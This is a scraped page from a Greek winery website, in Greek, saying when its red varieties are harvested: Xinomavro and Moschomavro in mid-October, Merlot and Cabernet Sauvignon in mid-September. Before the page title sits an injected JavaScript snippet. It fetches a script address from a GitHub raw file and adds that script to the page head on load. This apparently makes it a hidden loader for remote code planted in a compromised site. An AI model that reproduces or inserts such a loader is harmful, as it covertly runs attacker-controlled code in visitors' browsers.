;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Πότε ένας αμπελώνας είναι έτοιμος για συγκομιδή; – nakoswinery

Στο Κτήμα μας καλλιεργούνται δύο
ερυθρές ελληνικές ποικιλίες το Ξινόμαυρο και το Μοσχόμαυρο καθώς και δύο ξενικές ερυθρές το Merlot και το Cabernet Sauvignon.

Ο τρύγος των
όψιμων ποικιλιών  Ξινόμαυρο και Μοσχόμαυρο λαμβάνει χώρα συνήθως στα μέσα Οκτωβρίου,
ενώ των
σχετικά πιο πρώιμων ποικιλιών Merlotκαι CabernetSauvignonστα  μέσα  Σεπτεμβρίου.

Μετάβαση στο περιεχόμενο